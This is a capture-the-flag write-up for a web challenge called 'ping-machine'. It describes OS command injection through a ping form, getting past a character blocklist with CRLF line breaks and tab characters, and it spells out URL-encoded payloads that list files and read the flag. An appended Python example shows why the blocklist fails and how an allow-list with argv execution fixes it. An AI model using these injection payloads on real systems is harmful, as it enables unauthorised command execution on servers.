# M*CTF ping-machine WriteUp (Web) - 954 points

## Task description

![Description](https://i.imgur.com/o36s5ou.png)

## Task view

![](https://i.imgur.com/tQk09oZ.png)

## Solution

### Start BurpSuite and catch the request with our data:

![Raw request](https://i.imgur.com/aMDhyDR.png)

We can use IPs or domain names.

### Find blocked symbols

Some symbols in the input data are blocked, so we need to bypass them.

![Blocked symbol](https://i.imgur.com/LWxGUG0.png)

Blocked symbols are:

* `$`
* `&`
* `|`
* spaces
* `;`

### Execute new command

To add a new command to the payload, put a CRLF (`%0D%0A`) between commands.

![CRLF](https://i.imgur.com/qWwrANZ.png)

### Bypass spaces

To bypass the space filter, use tabs (`%09`).

![Bypass spaces](https://i.imgur.com/OwaB00o.png)

As we can see, everything works, but we only get the last line of output.

### ls -la /

Since we can't see all the output at once, we redirect the output to a file and read it line by line (`sed '<number of line>!D' /tmp/test`).

![ls -la /](https://i.imgur.com/vWIKDLY.png)

```
addr=google.com%0D%0Als%09-la%09/%09>%09/tmp/test
```

![finding flag](https://i.imgur.com/ep6T7tC.png)

```
addr=google.com%0D%0Ased%09'9!D'%09/tmp/test
```

Then read the flag and delete `/tmp/test`.

![flag](https://i.imgur.com/gb9yuBh.png)

```
addr=google.com%0D%0Acat%09/flag_HTDkf
```

### **Flag:** `MCTF{$p@ce_1N]ec7i0n}`
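
Why the blocklist above fails and what a fix looks like, as an added example that is not part of the original write-up or the challenge's code: it models the five-character blocklist listed above, runs the three payloads from this page through it, and compares it with an allow-list check that feeds an argv list instead of a shell string. The function names, the `ping -c 1` command line and the hostname policy are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Character blocklist as listed in the write-up: $ & | space ;
BLOCKED = set("$&| ;")
# Characters an IP literal or hostname may contain (assumed policy).
SAFE_CHARS = re.compile(r"[A-Za-z0-9.:-]+")
# One DNS label: letters, digits, hyphen; no leading or trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def blocklist_accepts(addr: str) -> bool:
    """Model of the filter described above (assumed behaviour)."""
    return not any(ch in BLOCKED for ch in addr)


def is_valid_target(addr: str) -> bool:
    """Allow-list check: an IP literal or a plain hostname, nothing else."""
    if not SAFE_CHARS.fullmatch(addr) or len(addr) > 253:
        return False  # CR, LF, tab, '>', quotes and '/' all stop here
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return all(LABEL.fullmatch(label) for label in addr.split("."))


def build_ping_argv(addr: str) -> list[str]:
    """Return an argv list meant for subprocess.run(argv), shell=False."""
    if not is_valid_target(addr):
        raise ValueError("rejected target")
    # "--" ends option parsing, so the value can never be read as a flag.
    return ["ping", "-c", "1", "--", addr]


# Payloads copied from the write-up, URL-decoded as the server receives them.
PAGE_PAYLOADS = [unquote(p) for p in (
    "google.com%0D%0Als%09-la%09/%09>%09/tmp/test",
    "google.com%0D%0Ased%09'9!D'%09/tmp/test",
    "google.com%0D%0Acat%09/flag_HTDkf",
)]

if __name__ == "__main__":
    for p in PAGE_PAYLOADS + ["google.com", "8.8.8.8"]:
        print(repr(p), blocklist_accepts(p), is_valid_target(p))
```

Because the argv list is passed without a shell, newlines, tabs and redirection characters would have no special meaning even if validation were skipped; the allow-list is a second layer on top of that.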